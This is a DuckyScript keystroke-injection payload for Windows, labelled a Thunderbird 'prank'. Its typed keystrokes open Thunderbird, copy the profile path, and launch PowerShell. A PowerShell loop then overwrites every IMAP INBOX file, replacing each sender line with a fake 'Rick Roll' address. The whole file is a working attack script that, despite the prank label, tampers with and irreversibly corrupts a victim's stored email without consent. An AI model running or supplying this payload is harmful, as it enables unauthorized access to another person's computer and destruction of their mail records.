REM #####################################################
REM #                                     		        #
REM # Title       : Prank In The Middle - Thunderbird   #
REM # Author      : Aleff                 		        #
REM # Version	  : 1.0                   		        #
REM # Category	  : Prank                 	            #
REM # Target	  : Windows 10/11         		        #
REM #                                     		        #
REM #####################################################

REM Open Thunderbird and goto settings
GUI r
STRING thunderbird
ENTER
DELAY 1000
REPEAT 4 TAB
ENTER
DELAY 500
REPEAT 2 UPARROW
ENTER
DELAY 500
REPEAT 3 UPARROW
ENTER
DELAY 500

REM Goto profile directory
REPEAT 11 TAB
ENTER
DELAY 500

REM Copy the directory path
REPEAT 4 TAB
DELAY 500
SPACE
DELAY 500
ENTER
DELAY 500
CTRL c
DELAY 500
ALT F4
DELAY 500

REM Open the powershell and goto the directory
GUI r
STRING powershell
ENTER
DELAY 1500
STRING cd 
DELAY 500
CTRL v
DELAY 500
ENTER
DELAY 500

REM Get the INBOX content and edit it overwriting. Then close the powershell
STRING cd ImapMail
ENTER
DELAY 500
STRING $directories = Get-ChildItem -Directory | Select-Object FullName
ENTER
DELAY 500
STRING foreach ($dir in $directories) {
ENTER
DELAY 500
STRING # Replace backslashes with slash
ENTER
DELAY 500
STRING $newPath = $dir.FullName -replace '\\', '/'
ENTER
DELAY 500
STRING # Add the sub-string “/INBOX” to the end
ENTER
DELAY 500
STRING $newPath += "/INBOX"
ENTER
DELAY 500
STRING # Check whether the INBOX file exists
ENTER
DELAY 500
STRING if (Test-Path $newPath) {
ENTER
DELAY 500
STRING # Check whether the INBOX file exists
ENTER
DELAY 500
STRING $emails = Get-Content -Path $newPath -Raw
ENTER
DELAY 500
STRING # Replace email sender with Rick Roll!
ENTER
DELAY 500
STRING # The following operation is simplified and assumes that the sender starts with “From: ...”
ENTER
DELAY 500
STRING # and does not contain complex MIME structures
ENTER
DELAY 500
STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll <Rick.Roll@tinyurl.com/prinkrollme>"
ENTER
DELAY 500
STRING # Write the modified content into the INBOX file.
ENTER
DELAY 500
STRING Set-Content -Path $newPath -Value $modifiedEmails -Force
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
STRING }
ENTER
DELAY 1000
ALT F4